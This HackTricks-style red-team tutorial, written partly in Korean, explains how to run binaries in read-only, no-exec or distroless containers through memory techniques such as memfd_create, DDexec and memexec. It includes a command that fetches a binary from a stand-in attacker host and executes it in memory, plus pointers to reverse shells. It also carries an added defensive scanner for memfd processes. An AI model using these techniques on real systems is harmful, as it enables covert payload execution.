Bypass FS protections: read-only / no-exec / Distroless

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE). To see the assessment tracks (ARTA/GRTA/AzRTA) and Linux Hacking Expert (LHE), browse the full HackTricks Training catalogue.

Support HackTricks

Videos

In the following videos you can find the techniques mentioned in this page explained more in depth:

read-only / no-exec scenario

์ปจํ…Œ์ด๋„ˆ์—์„œ ํŠนํžˆ read-only (ro) file system protection์œผ๋กœ ๋งˆ์šดํŠธ๋œ linux ์‹œ์Šคํ…œ์„ ์ฐพ๋Š” ๊ฒฝ์šฐ๊ฐ€ ์ ์  ๋งŽ์•„์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ์ปจํ…Œ์ด๋„ˆ๋ฅผ ro ํŒŒ์ผ ์‹œ์Šคํ…œ์œผ๋กœ ์‹คํ–‰ํ•˜๋Š” ๊ฒƒ์ด securitycontext์— **readOnlyRootFilesystem: true**๋ฅผ ์„ค์ •ํ•˜๋Š” ๊ฒƒ๋งŒํผ ์‰ฝ๊ธฐ ๋•Œ๋ฌธ์ž…๋‹ˆ๋‹ค:

apiVersion: v1
kind: Pod
metadata:
  name: alpine-pod
spec:
  containers:
  - name: alpine
    image: alpine
    securityContext:
      readOnlyRootFilesystem: true
    command: ["sh", "-c", "while true; do sleep 1000; done"]

However, even if the file system is mounted as ro, **/dev/shm** will still be writable, so it is not true that nothing can be written to disk. That directory, though, is mounted with no-exec protection, so a binary downloaded there cannot be executed.

Warning

From a red team perspective, this complicates downloading and executing binaries that are not already on the system (such as backdoors, or enumerators like kubectl).

Easiest bypass: Scripts

๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ์–ธ๊ธ‰ํ–ˆ์ง€๋งŒ, ์ธํ„ฐํ”„๋ฆฌํ„ฐ๊ฐ€ ์‹œ์Šคํ…œ์— ์กด์žฌํ•œ๋‹ค๋ฉด ์–ด๋– ํ•œ ์Šคํฌ๋ฆฝํŠธ๋“  ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด sh๊ฐ€ ์žˆ์œผ๋ฉด shell script, python์ด ์„ค์น˜๋˜์–ด ์žˆ์œผ๋ฉด python script๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

However, this alone is not enough to run a binary backdoor or any other binary tool you might need.

Memory Bypasses

ํŒŒ์ผ ์‹œ์Šคํ…œ์ด ๋ฐ”์ด๋„ˆ๋ฆฌ ์‹คํ–‰์„ ํ—ˆ์šฉํ•˜์ง€ ์•Š๋Š”๋‹ค๋ฉด, ๊ฐ€์žฅ ์ข‹์€ ๋ฐฉ๋ฒ•์€ ๋ฉ”๋ชจ๋ฆฌ์—์„œ ์‹คํ–‰ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๋ณดํ˜ธ๋Š” ๋ฉ”๋ชจ๋ฆฌ์—๋Š” ์ ์šฉ๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค.

FD + exec syscall bypass

If a powerful scripting engine such as Python, Perl or Ruby is available on the machine, you can download the binary to run, store it in a memory file descriptor (the memfd_create syscall), which is not covered by those protections, and then call an exec syscall specifying that fd as the file to execute.

The fileless-elf-exec project makes this easy. Given a binary, it generates a script in the chosen language that embeds the binary compressed and base64-encoded, together with the instructions to decode and decompress it into an fd created with the memfd_create syscall and the exec syscall call that runs it.

Warning

This does not work in other scripting languages such as PHP or Node, because they have no built-in way to issue raw syscalls from a script, so memfd_create cannot be called to create the memory fd in which to store the binary.

Moreover, creating a regular fd from a file in /dev/shm does not work either: the no-exec protection applies there, so execution is not allowed.
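From the defender's side, a process started this way is easy to spot on a live host: the kernel exposes a memfd-backed image as an exe link of the form `/memfd:<name> (deleted)`. The following scanner, an added example that is not part of the original page or of the fileless-elf-exec project, walks a procfs tree and reports such processes; the `proc_root` parameter and `build_sample_proc_tree` helper are assumptions added so it can be run against a constructed tree offline.

```python
import os
import re
from typing import Dict, List

# memfd_create() creates an anonymous file the kernel names "/memfd:<name>"; after
# execve() on that fd the process's /proc/<pid>/exe link resolves to that path
# followed by " (deleted)", which no regular on-disk executable produces.
MEMFD_RE = re.compile(r"^/memfd:.*\(deleted\)$")


def is_memfd_exe(exe_target: str) -> bool:
    """True if a /proc/<pid>/exe link target points at a memfd-backed image."""
    return MEMFD_RE.match(exe_target) is not None


def read_cmdline(proc_dir: str) -> str:
    """Return the NUL-separated cmdline as a single printable string ('' if unreadable)."""
    try:
        with open(os.path.join(proc_dir, "cmdline"), "rb") as fh:
            return fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
    except OSError:
        return ""


def find_memfd_processes(proc_root: str = "/proc") -> List[Dict[str, str]]:
    """Scan a procfs tree and report every process whose executable lives in a memfd.

    proc_root defaults to the live /proc (reading other users' exe links needs root);
    it is parameterised so the scan can be pointed at a constructed tree for testing.
    """
    hits: List[Dict[str, str]] = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():          # skip self, sys, net, ... only PID dirs
            continue
        proc_dir = os.path.join(proc_root, entry)
        try:
            target = os.readlink(os.path.join(proc_dir, "exe"))
        except OSError:
            continue                     # kernel thread, already exited, or no permission
        if is_memfd_exe(target):
            hits.append({"pid": entry, "exe": target, "cmdline": read_cmdline(proc_dir)})
    return hits


def build_sample_proc_tree(root: str) -> None:
    """Constructed sample: one memfd-backed process (PID 123) and one normal one (456)."""
    os.makedirs(os.path.join(root, "123"))
    os.symlink("/memfd:payload (deleted)", os.path.join(root, "123", "exe"))
    with open(os.path.join(root, "123", "cmdline"), "wb") as fh:
        fh.write(b"argv0\0foo\0bar\0")
    os.makedirs(os.path.join(root, "456"))
    os.symlink("/usr/bin/python3", os.path.join(root, "456", "exe"))
    os.makedirs(os.path.join(root, "self"))  # non-numeric entry, must be ignored
```

On a real host, run `find_memfd_processes()` as root and treat any hit whose cmdline is an interpreter (python, perl, ruby) as a candidate for the technique above.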

DDexec / EverythingExec

DDexec / EverythingExec is a technique that lets you modify the memory of your own process by overwriting **/proc/self/mem**.

๋”ฐ๋ผ์„œ ํ”„๋กœ์„ธ์Šค๊ฐ€ ์‹คํ–‰ํ•˜๋Š” ์–ด์…ˆ๋ธ”๋ฆฌ ์ฝ”๋“œ๋ฅผ ์ œ์–ดํ•จ์œผ๋กœ์จ, shellcode๋ฅผ ์ž‘์„ฑํ•˜๊ณ  ํ”„๋กœ์„ธ์Šค๋ฅผ โ€œ๋ณ€ํ˜•โ€œ์‹œ์ผœ ์ž„์˜์˜ ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Tip

DDexec / EverythingExec lets you load and execute your own shellcode or any binary from memory.

# Basic example
wget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo bar

For more information about this technique check the Github or:

DDexec / EverythingExec

MemExec

Memexec is the natural next step of DDexec. It is DDexec shellcode turned into a daemon: instead of relaunching DDexec every time you want to run a different binary, you run the memexec shellcode once via the DDexec technique and then communicate with this daemon to pass it new binaries to load and run.

You can find an example on how to use memexec to execute binaries from a PHP reverse shell in https://github.com/arget13/memexec/blob/main/a.php.

Memdlopen

With a purpose similar to DDexec, the memdlopen technique offers an easier way to load binaries into memory and execute them later. It can even load binaries that have dependencies.

Distroless Bypass

For a dedicated explanation of what distroless actually is, when it helps, when it does not, and how it changes post-exploitation tradecraft in containers, check:

Distroless

What is distroless

Distroless containers contain only the bare minimum components necessary to run a specific application or service, such as libraries and runtime dependencies, but exclude larger components like a package manager, shell, or system utilities.

The goal of distroless containers is to reduce the attack surface of containers by eliminating unnecessary components and minimising the number of vulnerabilities that can be exploited.

Reverse Shell

In a distroless container you might not even find sh or bash to get a regular shell. You won't find binaries such as ls, whoami, id… everything you usually run on a system.

Warning

Therefore, you won't be able to get a reverse shell or enumerate the system as you usually do.

However, if the compromised container is running, for example, a Flask web app, then Python is installed, and therefore you can grab a Python reverse shell. If it's running Node, you can grab a Node reverse shell, and the same goes for almost any scripting language.

Tip

Using the scripting language you could enumerate the system using the language capabilities.

If there are no read-only/no-exec protections, you could abuse your reverse shell to write your binaries to the file system and execute them.

Tip

However, in this kind of container these protections will usually be present, but you can use the memory execution techniques above to bypass them.

You can find examples on how to exploit some RCE vulnerabilities to get scripting languages reverse shells and execute binaries from memory in https://github.com/carlospolop/DistrolessRCE.
